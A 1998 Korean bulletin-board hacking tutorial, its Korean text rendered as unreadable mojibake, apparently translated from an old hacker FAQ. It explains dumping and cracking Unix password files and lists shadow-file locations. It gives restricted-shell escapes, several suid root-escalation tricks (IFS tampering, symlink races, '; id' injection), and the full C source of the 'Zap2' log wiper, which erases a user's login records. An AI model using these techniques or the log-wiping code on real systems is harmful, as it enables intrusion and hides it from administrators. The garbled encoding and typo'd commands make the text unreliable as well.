¸®´ª½º ±âŸ ÀÚ·á |
---|
Á¦¸ñ | ÇØÅ· °Á #1 1998/06/30 (14:18) |
À̸§ | ±èÈ¿¿ø |
¹øÈ£ | 32 |
Á¶È¸ | 230 |
º»¹® |
-------------------------------------------------------------------------------- UNIX¿¡¼ ¾î¶»°Ô Æнº¿öµå ÆÄÀÏ¿¡ Á¢±ÙÇÒ ¼ö ÀÖ³ª? Ç¥ÁØ UNIX¿¡¼ Æнº¿öµå ÆÄÀÏÀº /etc/passwdÀÌ´Ù. UNIX Áß¿¡¼ NIS/yp ¶Ç´Â Æнº¿öµå »õµµ¿ì±â´ÉÀ» °®Ãá °æ¿ì¿¡ Æнº¿öµå Á¤º¸´Â ´Ù¸¥ °÷¿¡ ÀÖ´Ù. Æнº¿öµå ÆÄÀÏÀÇ ¿£Æ®¸®´Â 7°³ÀÇ ÄÝ·ÐÀ¸·Î ±¸ºÐµÈ Çʵ尡 ÀÖ´Ù. ±¸ºÐÇؼ º¸¸é, ÀÌ Æнº¿öµå ÆÄÀÏÀÇ ÁÙÀº ´ÙÀ½°ú °°´Ù. Username(»ç¿ëÀÚ À̸§) ¾ÏÈ£ÈµÈ Æнº¿öµå (¼±ÅÃÀûÀÎ Æнº¿öµå ¼ö¸í µ¥ÀÌÅÍ) »ç¿ëÀÚ ¹øÈ£ ±×·ì ¹øÈ£ GECOS Á¤º¸ Ȩ µð·ºÅ丮 ½© ] ] /etc/passwdÀÇ ¿£Æ®¸®ÀÇ ÀÏ·Ê: ] ] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] UNIX Æнº¿öµå¸¦ ¾î¶»°Ô ±ú³ª? ÀϹÝÀûÀÎ ¹ÏÀ½°ú´Â »ó¹ÝµÇ°ÚÁö¸¸, UNIXÀÇ Æнº¿öµå ÆÄÀÏÀº Çص¶ÇÒ ¼ö ¾ø´Ù. UNIX Æнº¿öµå´Â ´Ü¹ÝÇâ ÇÔ¼ö(one way function)À¸·Î ¾ÏȣȵǾî ÀÖ´Ù. ·Î±×ÀÎ ÇÁ·Î±×·¥Àº "password:"¶ó°í Ç¥½ÃµÇ´Â ÇÁ·ÒÇÁÆ®¿¡¼ ÀԷµǴ Æнº¿öµå¸¦ ¾ÏÈ£ÈÇÏ¿© Æнº¿öµå ÆÄÀÏ¿¡ ¾ÏÈ£ÈµÈ Æнº¿öµå¿Í ºñ±³ÇÑ´Ù. Æнº¿öµå¸¦ ±ú´Â ÇÁ·Î±×·¥(password cracking program)Àº ´Ü¾îÀå(wordlist)¸¦ ÀÌ¿ëÇÑ´Ù. ´Ü¾îÀå¿¡ ÀÖ´Â ´Ü¾î Çϳª¾¿À» ¾ÏÈ£ÈÇÏ¿© Æнº¿öµå ÆÄÀÏ¿¡ ÀÖ´Â ¾ÏÈ£¿Í ºñ±³ÇÑ´Ù. Áö±Ý±îÁö ³ª¿Í ÀÖ´Â °¡Àå ÁÁÀº Æнº¿öµå ±ú´Â ÇÁ·Î±×·¥Àº Alec MuffettÀÌ ÀÛ¼ºÇÑ CrackÀÌ´Ù. DOS¿ë ÇÁ·Î±×·¥À¸·Î´Â CrackJackÀÌ °¡Àå ÁÁ´Ù. CrackJackÀº ftp¸¦ ÀÌ¿ëÇÏ¿© clark.netÀÇ /ub/jcase/ µð·ºÅ丮¿¡¼ ±¸ÇÒ ¼ö ÀÖ´Ù. Æнº¿öµå »õµµ¿ì¶õ ¹«¾ùÀΰ¡? Æнº¿öµå »õµµ¿ì¶õ º¸¾È ½Ã½ºÅÛÀ¸·Î¼ ¾ÏÈ£ÈµÈ /etc/passwdÀÇ Æнº¿öµå Çʵ尡 Ưº°ÇÑ ¹®ÀڷΠġȯµÇ¾î ÀÖÀ¸¸ç, ½ÇÁ¦ÀÇ Æнº¿öµå´Â Á¤»óÀûÀÎ »ç¿ëÀÚ°¡ ÀÐÀ» ¼ö ¾ø´Â ÆÄÀÏ¿¡ ÀúÀåµÇ¾î ÀÖ´Ù. ´ëºÎºÐ(ÀüºÎ´Â ¾Æ´Ï°í)ÀÇ ½Ã½ºÅÛ¿¡¼ Æнº¿öµå »õµµ¿ì¸¦ ±ú±â À§Çؼ getpwent()ÇÔ¼ö¸¦ ¿¬¼ÓÀûÀ¸·Î ºÎ¸£´Â ÇÁ·Î±×·¥À» ÀÛ¼ºÇÏ¿© Æнº¿öµå ÆÄÀÏÀ» ¸¸µé ¼ö ÀÖ´Ù. ¿¹: #include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } »õµµ¿ìÈ µÇ¾î ÀÖ´Â Æнº¿öµå ÆÄÀÏÀº ¾îµð¼ 㳪? Unix Path(°æ·Î) Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter # of username>/<username> A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter * of username>/<username> SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever> System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * NIS/yp¶õ ¹«¾ùÀΰ¡? NIS(Network Information System)Àº ÇöÀçÀÇ À̸§ÀÌ°í ¿¹Àü¿¡´Â yp(Yellow Page)¶ó°í ºÒ¸®¿ü´Ù. NISÀÇ ¸ñÀûÀº ³×Æ®¿öÅ©¿¡¼ ¿©·¯ ±â°èµéÀÌ Æнº¿öµå¿Í °°Àº ±¸¼ºÁ¤º¸¸¦ °øÀ¯Çϱâ À§ÇÔÀÌ´Ù. NIS´Â ½Ã½ºÅÛ º¸¾ÈÀ» À§Çؼ ¼³°èµÇ¾î ÀÖÁö ¾Ê´Ù. NIS¸¦ ÀÌ¿ëÇÏ°í ÀÖ´Ù¸é /etc/passwd ÆÄÀÏ¿¡ ´ÙÀ½°ú °°Àº °ÍÀÌ µé¾î ÀÖ´Ù. +::0:0::: ½ÇÁ¦ Æнº¿öµå ÆÄÀÏÀ» º¸±â À§Çؼ "ypcat passwd" ¸í·ÉÀ» ÀÌ¿ëÇÏ¸é µÈ´Ù. Æнº¿öµå ÆÄÀÏ¿¡¼ ½±Ç¥µÚ¿¡ ³ª¿À´Â ÀÌ»óÇÑ ¹®ÀÚµéÀº ¹«¾ùÀΰ¡? ¹®ÀÚ´Â Æнº¿öµå ¼ö¸í(age)À» ³ªÅ¸³»´Â °ÍÀÌ´Ù. Æнº¿öµå ¼ö¸íÀº °ü¸®ÀÚ°¡ Á¤ÇÑ ±âÀÏ ³»¿¡ Æнº¿öµå ÆÄÀÏÀ» ¹Ù²Ùµµ·Ï ÇÑ´Ù. Æнº¿öµå ¼ö¸íÀº »ç¿ëÀÚ°¡ Æнº¿öµå¸¦ ¹Ù²Ù±â Àü¿¡ Á¤ÇØÁø ½Ã°£¸¸ÅÀº »ç¿ëÇϵµ·Ï Çϱ⵵ ÇÑ´Ù. ] ] Æнº¿öµå ¼ö¸í ±â´ÉÀÌ µé¾î ÀÖ´Â /etc/passwd ÆÄÀÏÀÇ ÀÏ·Ê ] ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] ¾ÏÈ£ÈµÈ Æнº¿öµå ÇÊµå µÚÀÇ ½°Ç¥¿¡ ÁÖÀÇÇÏÀÚ. ½°Ç¥µÚ¿¡ ³ª¿À´Â ¹®ÀÚ´Â ¸ðµÎ Æнº¿öµå ¼ö·É±â¹ýÀ» À§Çؼ »ç¿ëµÈ´Ù. ] ] À§ ¿¹¿¡¼ÀÇ Æнº¿öµå ¼ö¸í ¹®ÀÚ ] ] M.z8 ] 4 °³ÀÇ ¹®ÀÚ°¡ ´ÙÀ½°ú °°ÀÌ ¹ø¿ªµÈ´Ù. 1: Æнº¿öµå¸¦ º¯°æÇÏÁö ¾Ê°í »ç¿ëÇÒ ¼ö ÀÖ´Â ÃÖ´ë ÁÖ(week)ÀÇ ¼ö 2: Æнº¿öµå¸¦ º¯°æÇϱâ Àü±îÁö »ç¿ëÇØ¾ß ÇÒ ÃÖ¼Ò ÁÖ(week)ÀÇ ¼ö 3&4: 1970³â ÀÌÈÄ·Î ÁÖÀÇ ¼ö·Î ¸¶Áö¸· Æнº¿öµå°¡ ¹Ù²ï ¶§ 3°¡Áö Ưº°ÇÑ °æ¿ì°¡ ÀÖ´Ù. ù ¹ø°¿Í µÎ ¹ø° ¹®ÀÚ°¡ '..'·Î ¼³Á¤µÇ¾î ÀÖÀ» ¶§, »ç¿ëÀÚ´Â ´ÙÀ½¿¡ ·Î±×ÀÎÇÒ ¶§ Æнº¿öµå¸¦ ¹Ù²ã¾ß¸¸ ÇÑ´Ù. ±×¸®°í³ª¼ Æнº¿öµå ÇÁ·Î±×·¥Àº Æнº¿öµå ¼ö¸í ¹®ÀÚ¸¦ ¾ø¾Ö°í, »ç¿ëÀÚ´Â ´Ù½Ã »õ·Î¿î Æнº¿öµå ¼ö¸í¿¡ Àû¿ëÀ» ¹Þ°Ô µÈ´Ù. ¼¼ ¹ø°¿Í ³× ¹ø° ¹®ÀÚ°¡ '..'·Î ¼³Á¤µÇ¾î ÀÖÀ» ¶§, »ç¿ëÀÚ´Â ´ÙÀ½¿¡ ·Î±×ÀÎÇÒ ¶§ Æнº¿öµå¸¦ ¹Ù²ã¾ß ÇÑ´Ù. Æнº¿öµå ÇÁ·Î±×·¥Àº ù ¹ø° µÎ ¹ø°ÀÇ °æ¿ì¿Í °°Àº ÇൿÀ» ÇÑ´Ù. ¸¸ÀÏ Ã¹ ¹ø° ¹®ÀÚ(MAX)°¡ µÎ ¹ø° ¹®ÀÚ(MIN) º¸´Ù ÀÛÀ» °æ¿ì, »ç¿ëÀÚ´Â Æнº¿öµå¸¦ ¹Ù±¼ ¼ö ÀÖ´Â Çã°¡°¡ ¹ÚÅ»µÈ´Ù. root¸¸ÀÌ ÀÌ »ç¿ëÀÚÀÇ Æнº¿öµå¸¦ º¯°æÇÒ ¼ö ÀÖ´Ù. su ¸í·ÉÀº Æнº¿öµå ¼ö¸í µ¥ÀÌÅ͸¦ °Ë»çÇÏÁö ¾Ê´Â´Ù´Âµ¥ À¯ÀÇÇϱ⠹ٶõ´Ù. ¸»¼ÒµÈ Æнº¿öµå¸¦ °¡Áø °èÁ¤À¸·Î su¸¦ ÇàÇÒ ¼ö ÀÖ´Ù. Æнº¿öµå ¼ö¸í ÄÚµå(Password Aging Codes) +------------------------------------------------------------------------+ | | | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | | Character: I J K L M N O P Q R S T U V W X Y Z a b | | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | Character: c d e f g h i j k l m n o p q r s t u v | | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | Character: w x y z | | Number: 60 61 62 63 | | | +------------------------------------------------------------------------+ VMSÀÇ Æнº¿öµå ÆÄÀÏ¿¡ ¾î¶»°Ô Á¢±ÙÇϳª? VMS¿¡¼ Æнº¿öµå ÆÄÀÏÀº SYS$SYSTEM:SYSUAF.DATÀÌ´Ù. ±×·¯³ª, UNIX¿Í´Â ´Ù¸£°Ô ´ëºÎºÐÀÇ »ç¿ëÀÚ´Â Æнº¿öµå ÆÄÀÏÀ» ÀÐÀ» ¼ö ÀÖ´Â ±ÇÇÑÀÌ ¾ø´Ù. VMS ¿¡¼´Â ¾î¶»°Ô Æнº¿öµå¸¦ ±ú³ª? SYS$GETUAF ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© SYSUAF.DAT¿¡ ÀÖ´Â ¾ÏÈ£ÈµÈ Æнº¿öµå¿Í °á°ú¸¦ ºñ±³ÇÏ´Â ÇÁ·Î±×·¥À» ÀÛ¼ºÇÑ´Ù. µÎ °¡Áö ÇÁ·Î±×·¥ÀÌ Àִµ¥, CHECK_PASSWORD ¿Í GUESS_PASSWORDÀÌ´Ù. ·Î±×·Î ³²±â³ª? VMSÀÇ °ÅÀÇ ¸ðµç °ÍÀ» ·Î±×·Î ³²±æ ¼ö ÀÖ´Ù. SHOW ACCOUNTING ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© ½Ã½ºÅÛÀÇ ·Î±× »óŸ¦ Á¶»çÇÒ ¼ö ÀÖ´Ù. ½Ã½ºÅÛ °¨»ç°¡ º¸¾ÈÀÇ ¸ñÀûÀ¸·Î ·Î±× Á¤º¸¸¦ ³²±â´Â °Í¿¡ ¹ÝÇØ, °è…Á¢´ ÀÌ¿ë»óÅ¿¡ ´ëÇÑ Á¤º¸¸¦ ³²±â´Â °ÍÀÌ ½Ã½ºÅÛ ¾îÄ«¿îÆÃÀÌ´Ù(CPU ÀÌ¿ë½Ã°£, Æ®¸°ÅÍ »ç¿ë µî). ¾îÄ«¿îÆÃÀ» ÇϱâÀ§Çؼ´Â ´ÙÀ½°ú °°Àº ÀýÂ÷¸¦ µû¸¥´Ù. $ SET ACCOUNTING [/ENABLE=(Activity...)] ÀÌ·¸°Ô Çϸé, SYS$MANAGER:ACCOUNTING>DAT ÆÄÀÏ¿¡ °¨½Ã ·Î±×Á¤º¸¸¦ ³²±ä´Ù. ÀÌ°ÍÀº ¶ÇÇÑ ÀÌÀü ·Î±× ÆÄÀÏÀ» ´Ý°í »õ·Î¿î ¹öÀüÀÇ ·Î±×¸¦ ³²±ä´Ù. ´ÙÀ½°ú °°Àº °ÍÀÌ ·Î±×·Î ³²À» ¼ö ÀÖ´Ù. BATCH Termination of a batch job DETACHED Termination of a detached job IMAGE Image execution INTERACTIVE Interactive job termination LOGIN_FAILURE Login failures MESSAGE Users messages NETWORK Network job termination PRINT Print Jobs PROCESS Any terminated process SUBPROCESS Termination of a subprocess º¸¾È °¨»ç¸¦ ÀÌ¿ëÇϱâ À§Çؼ´Â $ SET AUDIT /ALARM Àº º¸¾È ¿î¿µÀÚ·Î ÁöÁ¤µÈ Å͹̳ο¡ °æ°í¸¦ ¿ï¸®±â À§Çؼ »ç¿ëÇÏ´Â ¿É¼ÇÀÌ´Ù. ´Ù½Ã ¸»Çؼ SECURITY ±ÇÇÑÀÌ ÇÊ¿äÇÔÀ» Àϱú¿ì´Â µ¥ »ç¿ëµÈ´Ù. º¸¾È °¨»ç ±¸¼ºÀ» $ SHOW AUDIT /ALL¸í·ÉÀ» ÅëÇؼ ¾Ë¼ö ÀÖ´Ù. º¸¾È °¨»ç´Â ´ÙÀ½°ú °°Àº ÇàÀ§¸¦ ·Î±×·Î ³²±âµµ·Ï ÇÒ ¼ö ÀÖ´Ù. ACL Access Control List requested events AUTHORIZATION Modification to the system user authorization file SYS$SYSTEM:SYSUAF.DAT BREAKIN Attempted Break-ins FILE_ACCESS File or global section access INSTALL Occurrence of any INSTALL operations LOGFAILURE Any login failures LOGIN A login attempt from various sources LOGOUT Logouts MOUNT Mount or dismount requests VMS¿¡¼ÀÇ ±ÇÇÑÀº ¾î¶² °ÍÀÌ ÀÖ³ª? ACNT Allows you to restrain accounting messages ALLSPOOL Allows you to allocate spooled devices ALTPRI Allot Priority. This allows you to set any priority value BUGCHK Allows you make bug check error log entries BYPASS Enables you to disregard protections CMEXEC/ CMKRNL Change to executive or kernel mode. These privileges allow a process to execute optional routines with KERNEL and EXECUTIVE access modes. CMKRNL is the most powerful privilege on VMS as anything protected can be accessed if you have this privilege. You must have these privileges to gain access to the kernel data structures directly. DETACH This privilege allow you to create detached processes of arbitrary UICs DIAGNOSE With this privilege you can diagnose devices EXQUOTA Allows you to exceed your disk quota GROUP This privilege grants you permission to affect other processes in the same rank GRPNAM Allows you to insert group logical names into the group logical names table. GRPPRV Enables you to access system group objects through system protection field LOG_IO Allows you to issue logical input output requests MOUNT May execute the mount function NETMBX Allows you to create network connections OPER Allows you to perform operator functions PFNMAP Allows you to map to specific physical pages PHY_IO Allows you to perform physical input output requests PRMCEB Can create permanent common event clusters PRMGBL Allows you to create permanent global sections PRMMBX Allows you to create permanent mailboxes PSWAPM Allows you to change a processes swap mode READALL Allows you read access to everything SECURITY Enables you to perform security related functions SETPRV Enable all privileges SHARE Allows you to access devices allocated to other users. This is used to assign system mailboxes. SHMEM Enables you to modify objects in shared memory SYSGBL Allows you to create system wide permanent global sections SYSLCK Allows you to lock system wide resources SYSNAM Allows you to insert in system logical names in the names table. SYSPRV If a process holds this privilege then it is the same as a process holding the system user identification code. TMPMBX Allows you create temporary mailboxes VOLPRO Enables you to override volume protection WORLD When this is set you can affect other processes in the world ÇÁ·Î¼¼½º°¡ ¾î¶² ±ÇÇÑÀ¸·Î ¼öÇàÇÏ°í ÀÖ´ÂÁö ¾Ë±â À§Çؼ ´ÙÀ½°ú °°Àº ¸í·ÉÀ» »ç¿ëÇÑ´Ù. $ show /proc/priv Á¦ÇÑµÈ ½©¿¡¼ ¾î¶»°Ô ºüÁ® ³ª¿À³ª? À߸ø ÀÛ¼ºÇÑ Á¦ÇÑ ½©¿¡¼´Â ½©¿¡¼ »ç¿ëÇÏ´Â ±â´ÉÀ» °¡Áø ÇÁ·Î±×·¥À» ¼öÇàÇÔÀ¸·Î¼ ºüÁ®³ª¿Ã ¼ö ÀÖ´Ù. ÁÁÀº ¿¹°¡ viÀÌ´Ù. vi¸¦ ¼öÇàÇÒ ¶§ ´ÙÀ½°ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇ϶ó. :set shell=/bikn/sh ±×¸®°í ³ª¼ ´ÙÀ¸¸ð°¡ °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© ½©À» ¾ò´Â´Ù. : shell Á¦ÇÑ ½©¿¡¼ "cd" ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ¾øµµ·Ï ÇÑ´Ù¸é ±× °èÁ¤À¸·Î ftp¸¦ Çϸé cd¸¦ ÇÒ ¼ö ÀÖ´Ù. suid ½ºÅ©¸³Æ®³ª ÇÁ·Î±×·¥¿¡¼ ¾î¶»°Ô rootÀÇ ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ³ª? 1. ÇÁ·Î±×·¥¿¡¼ system()À» ÀÌ¿ëÇÏ¿© ´Ù¸¥ ÇÁ·Î±×·¥À» ºÎ¸¥´Ù.¸é, IFS¸¦ º¯°æÇÏ¿© ±× ÇÁ·Î±×·¥À» ¿ì·ÕÇÒ ¼ö ÀÖ´Ù. IFS´Â ³»ºÎ ÇÊµå ±¸ºÐÀÚ(Internal Field Separator)ÀÇ ¾àÀڷμ ½©¿¡¼ Àμö¸¦ ±¸ºÐÇÏ´Â ¹®Àڷμ »ç¿ëÇÏ´Â °ÍÀÌ´Ù. ÇÁ·Î±×·¥¿¡ ´ÙÀ½°ú °°Àº °ÍÀÌ Æ÷ÇԵȴٰí ÇÏÀÚ. system("bin/data") ±×¸®°í IFS¸¦ '/'·Î º¯°æÇÏ¸é ½©Àº ¸í·ÉÀ» ´ÙÀ½°ú °°ÀÌ ¹ø¿ªÇÑ´Ù. bin date ÀÌÁ¦, ÇÁ·Î±×·¥ Áß¿¡ binÀ̶ó´Â °ÍÀÌ °æ·Î(path)Áß¿¡ ÀÖ´Ù¸é, suid ÇÁ·Î±×·¥Àº /bin/date ÇÁ·Î±×·¥ ´ë½Å binÀ̶ó´Â ÇÁ·Î±×·¥À» ¼öÇàÇÏ°Ô µÈ´Ù. IFS¸¦ ¹Ù²Ù±â À§Çؼ, ´ÙÀ½°ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÑ´Ù. IFS='/'; export IFS setenv IFS '/' export IFS='/' 2. ½ºÅ©¸³Æ®¸¦ -i·Î ¿¬°á(link)ÇÑ´Ù. "-i"¶ó´Â ÇÁ·Î±×·¥À» ¸¸µé¾î ½Éº¼¸¯ ¸µÅ©(symbolic link)¸¦ ¸¸µç´Ù. "-i"¸¦ ¼öÇàÇÏ¸é ½©(/bin/sh)ÀÌ »óÈ£ÀÛ¿ë(interactive) ¸ðµå°¡ µÇ°Ô ÇÑ´Ù. ÀÌ ¹æ¹ýÀº suid(set uid)µÇ¾î ÀÖ´Â ½ºÅ©¸³Æ®¿¡¼¸¸ »ç¿ë°¡´ÉÇÏ´Ù. ¿¹: % ln suid.sh -i % -i # 3. °æÀï Á¶°ÇÀ» ÀÌ¿ëÇÑ´Ù. Ä¿³Î¿¡¼ /bin/sh¸¦ ·ÎµåÇÒ ¶§ ´Ù¸¥ ÇÁ·Î±×·¥À¸·Î ÇÁ·Î±×·¥¿¡ ´ëÇÑ ½Éº¼¸¯ ¸µÅ©¸¦ ¹Ù²Û´Ù. ¿¹: nice -19 suidprog; ln -s evilprog suidroot 4. ÇÁ·Î±×·¥¿¡ À߸øµÈ ÀÔ·ÂÀ» º¸³½´Ù. ÇÁ·Î±×·¥°ú ´Ù¸¥ ¸í·ÉÀ» ÇÑ Ä¿¸Çµå ¶óÀο¡¼ ¼öÇàÇÑ´Ù. ¿¹: suidprog; id ½Ã½ºÅÛ ·Î±×¿¡¼ ³» Á¸À縦 ¾ø¾Ö´Â ¹æ¹ýÀº? /etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏÀ» º¯°æÇÑ´Ù. À̰͵éÀº ÅؽºÆ® ÆÄÀÏÀÌ ¾Æ´Ï¶ó ¼ vi·Î ÆíÁýÇÒ ¼ö ¾ø´Ù. Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±×·¥À» ÀÛ¼ºÇØ¾ß ÇÑ´Ù. ¿¹: #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } |